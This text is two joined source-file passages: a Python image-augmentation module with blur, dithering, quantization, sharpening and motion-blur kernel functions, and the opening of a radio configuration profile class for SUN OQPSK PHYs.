    Raises:
        NotImplementedError: for unsupported ``image_type`` values.
        TypeError: for dtypes other than uint8/float32.
    """
    if image_type in [".jpeg", ".jpg"]:
        quality_flag = cv2.IMWRITE_JPEG_QUALITY
    elif image_type == ".webp":
        quality_flag = cv2.IMWRITE_WEBP_QUALITY
    else:
        # Bug fix: the exception was constructed but never raised, which
        # later crashed with UnboundLocalError on quality_flag.
        raise NotImplementedError("Only '.jpg' and '.webp' compression transforms are implemented. ")
    input_dtype = img.dtype
    needs_float = False
    if input_dtype == np.float32:
        warn(
            "Image compression augmentation "
            "is most effective with uint8 inputs, "
            "{} is used as input.".format(input_dtype),
            UserWarning,
        )
        # Scale float input to uint8 for the codec (was calling the undefined
        # name `from_float`). Assumes float32 input is in [0, 1] — the usual
        # contract for from_float — TODO confirm.
        img = (img * MAX_VALUES_BY_DTYPE[np.dtype("uint8")]).astype(np.uint8)
        needs_float = True
    elif input_dtype not in (np.uint8, np.float32):
        raise TypeError("Unexpected dtype {} for compression augmentation".format(input_dtype))
    # encoding parameters
    encode_param = [int(quality_flag), quality]
    # encode, then decode to materialize the compression artifacts
    is_success, encimg = cv2.imencode(image_type, img, encode_param)
    compressed_img = cv2.imdecode(encimg, cv2.IMREAD_UNCHANGED)
    if needs_float:
        # Scale back to [0, 1] float32 (was calling the undefined `to_float`).
        compressed_img = compressed_img.astype(np.float32) / 255.0
    return compressed_img
def valid_kernel(h: int, w: int, kernel_size: int):
    """Return a blur kernel size clamped to the image dimensions and forced odd.

    Args:
        h (int): image height.
        w (int): image width.
        kernel_size (int): requested kernel size (may be fractional).
    Returns:
        int: odd kernel size, derived from min(kernel_size, h, w) rounded up.
    """
    size = int(np.ceil(min(kernel_size, h, w)))
    # OpenCV blur kernels must have odd dimensions.
    return size + 1 if size % 2 == 0 else size
@preserve_shape
@preserve_type
def average_blur(img: np.ndarray, kernel_size: int = 3):
    r"""Blur an image with a normalized averaging (homogeneous) filter.

    Args:
        img (numpy ndarray): image to be augmented.
        kernel_size (int): size of the blur filter to use. Default: 3.
    Returns:
        numpy ndarray: blurred version of the image.
    """
    height, width = img.shape[:2]
    ksize = valid_kernel(height, width, kernel_size)
    # cv2.blur is the homogeneous averaging filter.
    apply_blur = _maybe_process_in_chunks(cv2.blur, ksize=(ksize, ksize))
    return apply_blur(img)
# Box blur and average blur should be equivalent (boxFilter normalizes by default).
@preserve_shape
@preserve_type
def box_blur(img: np.ndarray, kernel_size: int = 3):
    r"""Blur an image with an OpenCV box filter.

    Args:
        img (numpy ndarray): image to be augmented.
        kernel_size (int): size of the blur filter to use. Default: 3.
    Returns:
        numpy ndarray: blurred version of the image.
    """
    height, width = img.shape[:2]
    ksize = valid_kernel(height, width, kernel_size)
    # ddepth=-1 keeps the output depth equal to the input depth.
    apply_blur = _maybe_process_in_chunks(
        cv2.boxFilter, ddepth=-1, ksize=(ksize, ksize))
    return apply_blur(img)
@preserve_shape
@preserve_type
def gaussian_blur(img: np.ndarray, kernel_size: int = 3, sigma=0.0):
    r"""Blur an image with an OpenCV Gaussian filter.

    Args:
        img (numpy ndarray): image to be augmented.
        kernel_size (int): size of the blur filter to use. Default: 3.
        sigma (float): Gaussian sigma; when 0 OpenCV derives it as
            ``0.3*((kernel_size-1)*0.5 - 1) + 0.8``.
    Returns:
        numpy ndarray: blurred version of the image.
    """
    height, width = img.shape[:2]
    ksize = valid_kernel(height, width, kernel_size)
    apply_blur = _maybe_process_in_chunks(
        cv2.GaussianBlur, ksize=(ksize, ksize), sigmaX=sigma)
    return apply_blur(img)
@preserve_shape
@preserve_type
def median_blur(img: np.ndarray, kernel_size: int = 3):
    r"""Blur an image with an OpenCV median filter.

    Args:
        img (numpy ndarray): image to be augmented.
        kernel_size (int): size of the blur filter to use. Default: 3.
    Returns:
        numpy ndarray: blurred version of the image.
    """
    height, width = img.shape[:2]
    ksize = valid_kernel(height, width, kernel_size)
    # medianBlur takes a scalar aperture size, not a tuple.
    apply_blur = _maybe_process_in_chunks(cv2.medianBlur, ksize=ksize)
    return apply_blur(img)
# Needs testing
@preserve_shape
@preserve_type
def bilateral_blur(img: np.ndarray, kernel_size: int = 3, sigmaColor: int = 5, sigmaSpace: int = 5):
    r"""Blur an image with an edge-preserving OpenCV bilateral filter.

    Args:
        img (numpy ndarray): image to be augmented.
        kernel_size (int): pixel-neighborhood diameter. Default: 3. Large
            diameters (d > 5) are very slow; d=5 is recommended for real-time
            use, d=9 for offline use with heavy noise filtering.
        sigmaColor (int): filter sigma in color space. Larger values mix
            farther colors within the neighborhood, producing larger areas of
            semi-equal color.
        sigmaSpace (int): filter sigma in coordinate space. Larger values let
            farther pixels influence each other as long as their colors are
            close enough. When d > 0 the neighborhood size is fixed by d,
            regardless of sigmaSpace.

    For simplicity the two sigma values can be set equal: small (< 10) has
    little effect, large (> 150) makes the image look "cartoonish".

    Returns:
        numpy ndarray: blurred version of the image.
    """
    height, width = img.shape[:2]
    ksize = valid_kernel(height, width, kernel_size)
    # NOTE: bilateral filter didn't appear to work with kernel_size > 9; check.
    apply_blur = _maybe_process_in_chunks(
        cv2.bilateralFilter,
        d=ksize,
        sigmaColor=sigmaColor,
        sigmaSpace=sigmaSpace)
    return apply_blur(img)
@preserve_type
def km_quantize(img, K=8, single_rnd_color=False):
    r"""Color quantization with OpenCV K-Means clustering.

    Pixels are clustered in 3D color space into ``K`` clusters and each pixel
    is replaced by its cluster centroid, so the result contains at most ``K``
    distinct colors.

    Args:
        img (numpy ndarray): image to be quantized (HxWx3).
        K (int): number of color clusters. Default: 8.
        single_rnd_color (bool): unused; kept for interface compatibility.
    Returns:
        numpy ndarray: the quantized image, same shape as the input.
    """
    # Flatten to (num_pixels, 3) float32 samples, as cv2.kmeans requires.
    samples = np.float32(img.reshape((-1, 3)))
    # Stop after 10 iterations or when movement drops below 1.0.
    stop_criteria = (
        cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
    _, labels, centroids = cv2.kmeans(
        samples, K, None, stop_criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
    # Map every pixel to its centroid color and restore the image shape.
    quantized = centroids[labels.flatten()]
    return quantized.reshape(img.shape)
def simple_quantize(image, rgb_range):
    r"""Quantize an image to ``rgb_range`` evenly spaced intensity levels.

    Args:
        image (numpy ndarray): image to quantize.
        rgb_range: number of levels across the 0-255 range.
    Returns:
        numpy ndarray: quantized uint8 image.
    """
    step = 255. / rgb_range
    scaled = (image.astype(np.float32) * step / 255.).clip(0, 255).round()
    return (255. * scaled / step).astype(np.uint8)
@preserve_type
def noise_dither_bayer(img: np.ndarray):
    r"""Apply colored ordered (Bayer) dithering noise to the image.

    Each channel is thresholded independently against a tiled 4x4 Bayer
    matrix, so every output channel value is either 0 or 255.
    Note: the per-pixel loops are very slow on large images; crop first.
    The quantized color palette part is missing, but the dithering pattern is
    enough for models to learn dedithering.

    Args:
        img (numpy ndarray): image to be dithered.
    Returns:
        numpy ndarray: dithered version of the image.
    """
    imgtype = img.dtype
    # 4x4 Bayer matrix scaled to the 0..255 intensity range.
    bayer_matrix = 16 * np.array(
        [[0, 8, 2, 10], [12, 4, 14, 6], [3, 11, 1, 9], [15, 7, 13, 5]])
    dithered = np.zeros((img.shape[0], img.shape[1], 3), dtype=imgtype)
    # Channels 2/1/0 correspond to red/green/blue per the original naming.
    for channel in (2, 1, 0):
        plane = img[:, :, channel]
        for i in range(plane.shape[0]):
            for j in range(plane.shape[1]):
                if plane[i, j] > bayer_matrix[i % 4, j % 4]:
                    dithered[i, j, channel] = 255
    return dithered
@preserve_type
def noise_dither_fs(img: np.ndarray, samplingF = 1):
    r"""Adds colored Floyd-Steinberg dithering noise to the image.
    Floyd–Steinberg dithering is an image dithering algorithm first published in
    1976 by Robert W. Floyd and Louis Steinberg. It is commonly used by image
    manipulation software, for example when an image is converted into GIF format
    that is restricted to a maximum of 256 colors.
    The algorithm achieves dithering using error diffusion, meaning it pushes
    (adds) the residual quantization error of a pixel onto its neighboring
    pixels, to be dealt with later.
    https://en.wikipedia.org/wiki/Floyd–Steinberg_dithering
    Pseudocode:
        for each y from top to bottom
        for each x from left to right
            oldpixel  := pixel[x][y]
            newpixel  := find_closest_palette_color(oldpixel)
            pixel[x][y]  := newpixel
            quant_error  := oldpixel - newpixel
            pixel[x+1][y ] := pixel[x+1][y ] + quant_error * 7/16
            pixel[x-1][y+1] := pixel[x-1][y+1] + quant_error * 3/16
            pixel[x ][y+1] := pixel[x ][y+1] + quant_error * 5/16
            pixel[x+1][y+1] := pixel[x+1][y+1] + quant_error * 1/16
        find_closest_palette_color(oldpixel) = floor(oldpixel / 256)
    Args:
        img (numpy ndarray): Image to be dithered.
        samplingF: controls the amount of dithering
    Returns:
        numpy ndarray: version of the image with dithering applied.
    """
    #for Floyd-Steinberg dithering noise
    def minmax(v):
        # Clamp a scalar to the displayable [0, 255] range.
        if v > 255:
            v = 255
        if v < 0:
            v = 0
        return v
    size = img.shape
    #Note: these are very slow for large images, must crop first before applying.
    #Floyd-Steinberg
    re_fs = img.copy()
    samplingF = 1  # NOTE(review): this overrides the samplingF argument — looks unintended; confirm
    # Row-major sweep; borders are skipped so every pixel has the 4 neighbors
    # the error is diffused to.
    for i in range(0, size[0]-1):
        for j in range(1, size[1]-1):
            oldPixel_b = re_fs[i, j, 0] #[y, x]
            oldPixel_g = re_fs[i, j, 1] #[y, x]
            oldPixel_r = re_fs[i, j, 2] #[y, x]
            # Quantize each channel to the nearest of samplingF+1 levels.
            newPixel_b = np.round(samplingF * oldPixel_b/255.0) * (255/samplingF)
            newPixel_g = np.round(samplingF * oldPixel_g/255.0) * (255/samplingF)
            newPixel_r = np.round(samplingF * oldPixel_r/255.0) * (255/samplingF)
            re_fs[i, j, 0] = newPixel_b
            re_fs[i, j, 1] = newPixel_g
            re_fs[i, j, 2] = newPixel_r
            quant_error_b = oldPixel_b - newPixel_b
            quant_error_g = oldPixel_g - newPixel_g
            quant_error_r = oldPixel_r - newPixel_r
            # Diffuse the error with the standard 7/16, 3/16, 5/16, 1/16 weights.
            re_fs[i, j+1, 0] = minmax(re_fs[i, j+1, 0]+(7/16.0)*quant_error_b)
            re_fs[i, j+1, 1] = minmax(re_fs[i, j+1, 1]+(7/16.0)*quant_error_g)
            re_fs[i, j+1, 2] = minmax(re_fs[i, j+1, 2]+(7/16.0)*quant_error_r)
            re_fs[i+1, j-1, 0] = minmax(re_fs[i+1, j-1, 0]+(3/16.0)*quant_error_b)
            re_fs[i+1, j-1, 1] = minmax(re_fs[i+1, j-1, 1]+(3/16.0)*quant_error_g)
            re_fs[i+1, j-1, 2] = minmax(re_fs[i+1, j-1, 2]+(3/16.0)*quant_error_r)
            re_fs[i+1, j, 0] = minmax(re_fs[i+1, j, 0]+(5/16.0)*quant_error_b)
            re_fs[i+1, j, 1] = minmax(re_fs[i+1, j, 1]+(5/16.0)*quant_error_g)
            re_fs[i+1, j, 2] = minmax(re_fs[i+1, j, 2]+(5/16.0)*quant_error_r)
            re_fs[i+1, j+1, 0] = minmax(re_fs[i+1, j+1, 0]+(1/16.0)*quant_error_b)
            re_fs[i+1, j+1, 1] = minmax(re_fs[i+1, j+1, 1]+(1/16.0)*quant_error_g)
            re_fs[i+1, j+1, 2] = minmax(re_fs[i+1, j+1, 2]+(1/16.0)*quant_error_r)
    dithered = re_fs
    return dithered
def noise_dither_avg_bw(img):
    """Binarize a grayscale image by thresholding at its mean intensity.

    Based on https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py

    Args:
        img (numpy ndarray): grayscale or RGB image (RGB is converted first).
    Returns:
        numpy ndarray: uint8 image containing only 0 and 255.
    """
    if len(img.shape) > 2 and img.shape[2] != 1:
        img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    mean_level = np.average(img)
    return np.where(img < mean_level, 0, 255).astype(np.uint8)
def noise_dither_bayer_bw(img):
    """Apply black-and-white ordered (Bayer) dithering to a grayscale image.

    Based on https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py

    Args:
        img (numpy ndarray): grayscale or RGB image (RGB is converted first).
    Returns:
        numpy ndarray: uint8 image containing only 0 and 255.
    """
    if len(img.shape) > 2 and img.shape[2] != 1:
        img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    # 4x4 Bayer matrix scaled to the 0..255 range.
    bayer_matrix = 16 * np.array(
        [[0, 8, 2, 10], [12, 4, 14, 6], [3, 11, 1, 9], [15, 7, 13, 5]])
    # uint8 output may be wrong if the input is in the (0, 1) range.
    result = np.zeros(img.shape, dtype=np.uint8)
    for i in range(img.shape[0]):
        for j in range(img.shape[1]):
            if img[i, j] > bayer_matrix[i % 4, j % 4]:
                result[i, j] = 255
    return result
def noise_dither_bin_bw(img):
    """Binarize a grayscale image with a fixed threshold of 127.

    Based on https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py

    Args:
        img (numpy ndarray): grayscale or RGB image (RGB is converted first).
    Returns:
        numpy ndarray: uint8 image containing only 0 and 255.
    """
    if len(img.shape) > 2 and img.shape[2] != 1:
        img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    return np.where(img < 127, 0, 255).astype(np.uint8)
def noise_dither_fs_bw(img, samplingF = 1):
    """Apply black-and-white Floyd-Steinberg error-diffusion dithering.

    Based on https://github.com/QunixZ/Image_Dithering_Implements/blob/master/HW1.py

    Args:
        img (numpy ndarray): grayscale or RGB image (RGB is converted first).
        samplingF: controls the amount of dithering (quantization levels
            per 255 range).
    Returns:
        numpy ndarray: dithered version of the image.
    """
    #for Floyd-Steinberg dithering noise
    def minmax(v):
        # Clamp a scalar to the displayable [0, 255] range.
        if v > 255:
            v = 255
        if v < 0:
            v = 0
        return v
    if len(img.shape) > 2 and img.shape[2] != 1:
        img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    size = img.shape
    # Bug fix: work on a copy so the caller's array is not mutated in place
    # (the color version, noise_dither_fs, already copies).
    # NOTE(review): with uint8 input the error arithmetic can wrap around;
    # float input avoids that — confirm the expected input dtype.
    re_fs = img.copy()
    for i in range(0, size[0]-1):
        for j in range(1, size[1]-1):
            oldPixel = re_fs[i, j] #[y, x]
            # Quantize to the nearest of samplingF+1 levels.
            newPixel = np.round(samplingF * oldPixel/255.0) * (255/samplingF)
            re_fs[i, j] = newPixel
            quant_error = oldPixel - newPixel
            # Diffuse the error with the standard Floyd-Steinberg weights.
            re_fs[i, j+1] = minmax(re_fs[i, j+1]+(7/16.0)*quant_error)
            re_fs[i+1, j-1] = minmax(re_fs[i+1, j-1]+(3/16.0)*quant_error)
            re_fs[i+1, j] = minmax(re_fs[i+1, j]+(5/16.0)*quant_error)
            re_fs[i+1, j+1] = minmax(re_fs[i+1, j+1]+(1/16.0)*quant_error)
    return re_fs
def noise_dither_random_bw(img):
    """Apply random-threshold dithering to a grayscale image.

    Each pixel is compared against an independent uniform random threshold in
    [0, 256); pixels below their threshold become 0, the rest 255.

    Args:
        img (numpy ndarray): grayscale or RGB image (RGB is converted first).
    Returns:
        numpy ndarray: uint8 image containing only 0 and 255.
    """
    if len(img.shape) > 2 and img.shape[2] != 1:
        img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    # uint8 output may be wrong if the input is in the (0, 1) range.
    result = np.zeros(img.shape, dtype=np.uint8)
    for i in range(img.shape[0]):
        for j in range(img.shape[1]):
            # One fresh threshold per pixel, in row-major order.
            result[i, j] = 0 if img[i, j] < np.random.uniform(0, 256) else 255
    return result
#translate_chan()
#TBD
def filter_max_rgb(img: np.ndarray):
    r"""Keep, per pixel, only the channel(s) holding the maximum intensity.

    The Max RGB filter is used to visualize which channel contributes most to
    a given area of an image and can serve for simple color-based
    segmentation. More information:
    https://www.pyimagesearch.com/2015/09/28/implementing-the-max-rgb-filter-in-opencv/

    Args:
        img (numpy ndarray): image to be filtered (BGR channel order).
    Returns:
        numpy ndarray: version of the image after the Max RGB filter.
    """
    blue, green, red = cv2.split(img)
    # Per-pixel maximum across the three channels.
    peak = np.maximum(np.maximum(red, green), blue)
    # Zero out every channel value below the per-pixel maximum.
    for channel in (blue, green, red):
        channel[channel < peak] = 0
    return cv2.merge([blue, green, red])
@preserve_type
def filter_colorbalance(img: np.ndarray, percent=1):
    r"""Simple color balance algorithm (similar to Photoshop "auto levels").

    Clips the darkest and brightest ``percent/2`` percent of pixels in each
    channel and stretches the remaining range to [0, 255] via a lookup table.
    More information:
    https://gist.github.com/DavidYKay/9dad6c4ab0d8d7dbf3dc#gistcomment-3025656
    http://www.morethantechnical.com/2015/01/14/simplest-color-balance-with-opencv-wcode/
    https://web.stanford.edu/~sujason/ColorBalancing/simplestcb.html

    Args:
        img (numpy ndarray): image to be filtered.
        percent (int): amount of balance to apply.
    Returns:
        numpy ndarray: color-balanced version of the image.
    """
    n_pixels = img.shape[0] * img.shape[1]
    # Cumulative-histogram counts at which the low/high ends are clipped.
    cumstops = (
        n_pixels * percent / 200.0,
        n_pixels * (1 - percent / 200.0)
    )
    balanced_channels = []
    for channel in cv2.split(img):
        channel = channel.astype(np.uint8)
        cumhist = np.cumsum(cv2.calcHist([channel], [0], None, [256], (0, 256)))
        low_cut, high_cut = np.searchsorted(cumhist, cumstops)
        # LUT: 0 below low_cut, linear ramp in between, 255 above high_cut.
        lut = np.concatenate((
            np.zeros(low_cut),
            np.around(np.linspace(0, 255, high_cut - low_cut + 1)),
            255 * np.ones(255 - high_cut)
        ))
        balanced_channels.append(cv2.LUT(channel, lut.astype('uint8')))
    return cv2.merge(balanced_channels)
@preserve_shape
@preserve_type
def filter_unsharp(img: np.ndarray, blur_algo='median', kernel_size=None, strength=0.3, unsharp_algo='laplacian'):
    r"""Unsharp mask filter, used to sharpen images so edges look crisper.

    More information:
    https://www.idtools.com.au/unsharp-masking-python-opencv/

    Args:
        img (numpy ndarray): image to be filtered.
        blur_algo (str: 'median' or None): blur algorithm used by the
            laplacian (LoG) variant. Default: 'median'.
        kernel_size (int or None): blur kernel size for the laplacian
            variant; randomly chosen from {1, 3, 5} when None.
        strength (float: [0,1]): strength of the filter. Default: 0.3 (30%).
        unsharp_algo (str: 'DoG' or 'laplacian'): selection between DoG and
            LoG-style sharpening. Default: 'laplacian'.
    Returns:
        numpy ndarray: sharpened version of the image.
    """
    # strength could be randomized from 0.5 to 0.8 by callers.
    if unsharp_algo == 'DoG':
        # Difference of Gaussians: subtract a 3x3 blur from a 5x5 blur.
        blur5 = gaussian_blur(img.astype(np.float32), 5)
        blur3 = gaussian_blur(img.astype(np.float32), 3)
        DoGim = blur5 - blur3
        img_out = (img - strength * DoGim).astype(np.uint8)
    else:
        # 'laplacian': LoG-style (median blur used instead of gaussian).
        if kernel_size is None:
            kernel_sizes = [1, 3, 5]  # TODO: ks 5 is causing errors
            kernel_size = random.choice(kernel_sizes)
        if blur_algo == 'median':
            smooth = median_blur(img.astype(np.uint8), kernel_size)
        else:
            # Bug fix: `smooth` was undefined for any other blur_algo value,
            # raising UnboundLocalError; fall back to the unblurred image
            # (a plain Laplacian instead of Laplacian-of-Median).
            smooth = img.astype(np.uint8)
        # Laplacian of the (optionally) smoothed image.
        lap = cv2.Laplacian(smooth, cv2.CV_64F)
        if len(lap.shape) == 2:
            lap = lap.reshape(lap.shape[0], lap.shape[1], 1)
        # Sharpen, then saturate the pixels in either direction.
        img_out = img - strength * lap
        img_out[img_out > 255] = 255
        img_out[img_out < 0] = 0
    return img_out
def binarize(img, threshold):
    r"""Zero out pixels below ``threshold`` (e.g. for edge-detector output).

    Note: mutates ``img`` in place and also returns it; values at or above
    the threshold are left untouched.

    Args:
        img (numpy ndarray): image to binarize.
        threshold: cutoff value; everything below it becomes 0.
    Returns:
        numpy ndarray: the thresholded image.
    """
    below = img < threshold
    img[below] = 0.
    return img
@preserve_shape
@preserve_type
def filter_canny(img: np.ndarray, sigma: float = 0.33,
                 bin_thresh: bool = False, threshold: int = 127, to_rgb: bool = False):
    r"""Automatic Canny filter for edge detection.

    The hysteresis thresholds are derived from the median pixel intensity as
    ``[(1 - sigma) * median, (1 + sigma) * median]``, clamped to [0, 255].

    Args:
        img: image to be filtered.
        sigma: deviation from the median used for the automatic thresholds.
            Default: 0.33.
        bin_thresh: flag to binarize the edge map afterwards.
        threshold: cutoff used when ``bin_thresh`` is set.
        to_rgb: convert the single-channel edge map back to RGB; forced to
            True whenever the input has multiple channels.
    Returns:
        numpy ndarray: version of the image after the Canny filter.
    """
    if len(img.shape) > 2 and img.shape[2] != 1:
        to_rgb = True
    # compute the median of the pixel intensities
    med = np.median(img)
    # derive the low/high thresholds from the median
    low = int(max(0, (1.0 - sigma) * med))
    high = int(min(255, (1.0 + sigma) * med))
    edged = cv2.Canny(img, low, high)
    if bin_thresh:
        edged = binarize(edged, threshold)
    if to_rgb:
        edged = cv2.cvtColor(edged, cv2.COLOR_GRAY2RGB)
    return edged
def simple_motion_kernel(kernel_size):
    """Build a normalized motion-blur kernel along a random line segment.

    Two random endpoints are drawn inside a ``kernel_size`` x ``kernel_size``
    grid; when both endpoints share the same column, two distinct rows are
    drawn instead so the path has nonzero length.

    Args:
        kernel_size (int): side length of the square kernel.
    Returns:
        numpy ndarray: normalized motion kernel.
    """
    canvas = np.zeros((kernel_size, kernel_size), dtype=np.uint8)
    # Random endpoints of the motion path.
    x_start = random.randint(0, kernel_size - 1)
    x_end = random.randint(0, kernel_size - 1)
    if x_start == x_end:
        y_start, y_end = random.sample(range(kernel_size), 2)
    else:
        y_start = random.randint(0, kernel_size - 1)
        y_end = random.randint(0, kernel_size - 1)
    # Rasterize the motion path.
    cv2.line(canvas, (x_start, y_start), (x_end, y_end), 1, thickness=1)
    return norm_kernel(canvas)
def complex_motion_kernel(SIZE, SIZEx2, DIAGONAL,
                          COMPLEXITY: float=0, eps: float=0.1):
    """
    Get a kernel (psf) of given complexity.
    Adapted from: https://github.com/LeviBorodenko/motionblur

    Args:
        SIZE: final (width, height) of the kernel (passed to cv2.resize).
        SIZEx2: super-sized dimensions the path is drawn at.
        DIAGONAL: diagonal length of the super-sized canvas; scales line
            thickness and blur size.
        COMPLEXITY (float): how intense/varied the motion path is.
        eps (float): small constant keeping step sizes positive.
    Returns:
        numpy ndarray: normalized motion-blur kernel (sums to 1).
    """
    # generate the path
    motion_path = create_motion_path(
        DIAGONAL, SIZEx2, COMPLEXITY, eps)
    # initialize an array with super-sized dimensions
    kernel = np.zeros(SIZEx2, dtype=np.uint8)
    # convert path values to int32 NumPy array (needed for cv2.polylines)
    pts = np.array(motion_path).astype(np.int32)
    pts = pts.reshape((-1,1,2))
    # draw the path using polygon lines
    kernel = cv2.polylines(kernel,
        [pts], #motion_path, #
        isClosed=False,
        color=(64, 64, 64),
        thickness=int(DIAGONAL / 150), #=3,
        lineType=cv2.LINE_AA)
    # applying gaussian blur for realism
    # kernel_size = (2*radius)-1
    # for now added 2* that and sigmas = 30, lines are coming up aliased
    kernel_size = 2*(int(DIAGONAL * 0.01)*2)-1
    kernel = cv2.GaussianBlur(
        kernel,
        (kernel_size, kernel_size),
        sigmaX=30.0,
        sigmaY=30.0,
        borderType=0)
    # resize to actual size
    # Note: CV2 resize is faster, but has no antialias
    # kernel = resize(kernel,
    #     out_shape=SIZE,
    #     interpolation="gaussian", #"lanczos2", #lanczos3
    #     antialiasing=True)
    kernel = cv2.resize(kernel,
        dsize=SIZE,
        #fx=scale,
        #fy=scale,
        interpolation=cv2.INTER_CUBIC)
    # normalize kernel, so it sums up to 1
    return norm_kernel(kernel)
def create_motion_path(DIAGONAL, SIZEx2, COMPLEXITY, eps):
    """
    creates a motion blur path with the given complexity.
    Proceed in 5 steps:
    1. get a random number of random step sizes
    2. for each step get a random angle
    3. combine steps and angles into a sequence of increments
    4. create path out of increments
    5. translate path to fit the kernel dimensions
    NOTE: "random" means random but might depend on the given
    complexity

    Returns a list of (x, y) float tuples, centered on the middle of a
    kernel of shape SIZEx2 and randomly rotated.
    """
    # first find the lengths of the motion blur steps
    def getSteps():
        """
        Calculate the length of the steps taken by the motion blur
        A higher complexity lead to a longer total motion
        blur path and more varied steps along the way.
        Hence we sample:
        MAX_PATH_LEN =[U(0,1) + U(0, complexity^2)] * diagonal * 0.75
        and each step is:
        beta(1, 30) * (1 - COMPLEXITY + eps) * diagonal)
        """
        # getting max length of blur motion
        MAX_PATH_LEN = 0.75 * DIAGONAL * \
            (np.random.uniform() + np.random.uniform(0, COMPLEXITY**2))
        # getting step
        steps = []
        # NOTE(review): a sampled step >= MAX_PATH_LEN is discarded without
        # advancing the sum, so this loop may spin for a while when
        # MAX_PATH_LEN happens to be very small -- confirm acceptable.
        while sum(steps) < MAX_PATH_LEN:
            # sample next step
            step = np.random.beta(1, 30) * (1 - COMPLEXITY + eps) * DIAGONAL
            if step < MAX_PATH_LEN:
                steps.append(step)
        # return the total number of steps and the steps
        return len(steps), np.asarray(steps)
    def getAngles(NUM_STEPS):
        """
        Gets an angle for each step.
        The maximal angle should be larger the more intense
        the motion is, so it's sampled from a
        U(0, complexity * pi).
        Sample "jitter" from a beta(2,20) which is the
        probability that the next angle has a different
        sign than the previous one.
        """
        # first get the max angle in radians
        MAX_ANGLE = np.random.uniform(0, COMPLEXITY * math.pi)
        # now sample "jitter" which is the probability that the
        # next angle has a different sign than the previous one
        JITTER = np.random.beta(2, 20)
        # initialising angles (and sign of angle)
        angles = [np.random.uniform(low=-MAX_ANGLE, high=MAX_ANGLE)]
        while len(angles) < NUM_STEPS:
            # sample next angle (absolute value)
            angle = np.random.triangular(0, COMPLEXITY *
                                         MAX_ANGLE, MAX_ANGLE + eps)
            # with jitter probability change sign wrt previous angle
            if np.random.uniform() < JITTER:
                angle *= -np.sign(angles[-1])
            else:
                angle *= np.sign(angles[-1])
            angles.append(angle)
        # save angles
        return np.asarray(angles)
    # Get steps and angles
    NUM_STEPS, STEPS = getSteps()
    ANGLES = getAngles(NUM_STEPS)
    # Turn them into a path
    ####
    # turn angles and steps into complex numbers
    complex_increments = polar2z(STEPS, ANGLES)
    # generate path as the cumsum of these increments
    path_complex = np.cumsum(complex_increments)
    # find center of mass of path
    com_complex = sum(path_complex) / NUM_STEPS
    # shift path s.t. center of mass lies in the middle of
    # the kernel and apply a random rotation
    ###
    # center it on center of mass
    # center_of_kernel = (x + 1j * y) / 2
    center_of_kernel = (SIZEx2[0] + 1j * SIZEx2[1]) / 2
    path_complex -= com_complex
    # randomly rotate path by an angle a in (0, pi)
    path_complex *= np.exp(1j * np.random.uniform(0, math.pi))
    # center COM on center of kernel
    path_complex += center_of_kernel
    # convert complex path to final list of coordinate tuples
    return [(i.real, i.imag) for i in path_complex]
@preserve_channel_dim
def clahe(img, clip_limit=2.0, tile_grid_size=(8, 8)):
    """Apply Contrast-Limited Adaptive Histogram Equalization to a uint8 image.

    Single-channel images are equalized directly; RGB images are equalized
    on the L channel in LAB space and converted back.

    Raises TypeError for any dtype other than uint8.
    """
    if img.dtype != np.uint8:
        raise TypeError("clahe supports only uint8 inputs")
    equalizer = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=tile_grid_size)
    single_channel = img.ndim == 2 or img.shape[2] == 1
    if single_channel:
        return equalizer.apply(img)
    # color path: equalize only the lightness channel
    lab = cv2.cvtColor(img, cv2.COLOR_RGB2LAB)
    lab[:, :, 0] = equalizer.apply(lab[:, :, 0])
    return cv2.cvtColor(lab, cv2.COLOR_LAB2RGB)
|
<reponame>lmnotran/gecko_sdk
from pyradioconfig.calculator_model_framework.interfaces.iprofile import IProfile
from pyradioconfig.parts.common.profiles.ocelot_regs import build_modem_regs_ocelot
from pyradioconfig.parts.common.profiles.profile_common import buildCrcOutputs, buildFecOutputs, buildFrameOutputs, \
buildWhiteOutputs
from pyradioconfig.parts.common.utils.units_multiplier import UnitsMultiplier
from pyradioconfig.parts.sol.profiles.sw_profile_outputs_common import sw_profile_outputs_common_sol
class Profile_SUN_OQPSK_Sol(IProfile):
    """Calculator profile describing SUN OQPSK PHYs for the 'sol' chip family.

    Declares the user-facing inputs (frequencies, chiprate, FCS type),
    registers the profile's register/variable/info outputs, and forces the
    PHY settings that are fixed for every SUN OQPSK configuration.
    """
    def __init__(self):
        # Profile identity/metadata consumed by the calculator framework.
        self._profileName = "SUN_OQPSK"
        self._readable_name = "SUN OQPSK Profile"
        self._category = ""
        self._description = "Profile used for SUN OQPSK PHYs"
        self._default = False
        self._activation_logic = ""
        self._family = "sol"
        self._sw_profile_outputs_common = sw_profile_outputs_common_sol()
    def buildProfileModel(self, model):
        """Create the profile object on the model and populate its inputs and outputs."""
        # Build profile object and append it to the model
        profile = self._makeProfile(model)
        # Build inputs
        self.build_required_profile_inputs(model, profile)
        self.build_optional_profile_inputs(model, profile)
        self.build_advanced_profile_inputs(model, profile)
        self.build_hidden_profile_inputs(model, profile)
        self.build_deprecated_profile_inputs(model, profile)
        # Build outputs
        self.build_register_profile_outputs(model, profile)
        self.build_variable_profile_outputs(model, profile)
        self.build_info_profile_outputs(model, profile)
    def build_required_profile_inputs(self, model, profile):
        """Inputs the user must supply: frequencies, chiprate and FCS type."""
        self.make_required_input(profile, model.vars.base_frequency_hz, "operational_frequency",
                                 readable_name="Base Channel Frequency", value_limit_min=358000000,
                                 value_limit_max=956000000, units_multiplier=UnitsMultiplier.MEGA)
        self.make_required_input(profile, model.vars.channel_spacing_hz, "operational_frequency",
                                 readable_name="Channel Spacing", value_limit_min=0,
                                 value_limit_max=10000000,
                                 units_multiplier=UnitsMultiplier.KILO)
        self.make_required_input(profile, model.vars.xtal_frequency_hz, "crystal",
                                 readable_name="Crystal Frequency", value_limit_min=38000000,
                                 value_limit_max=40000000, units_multiplier=UnitsMultiplier.MEGA)
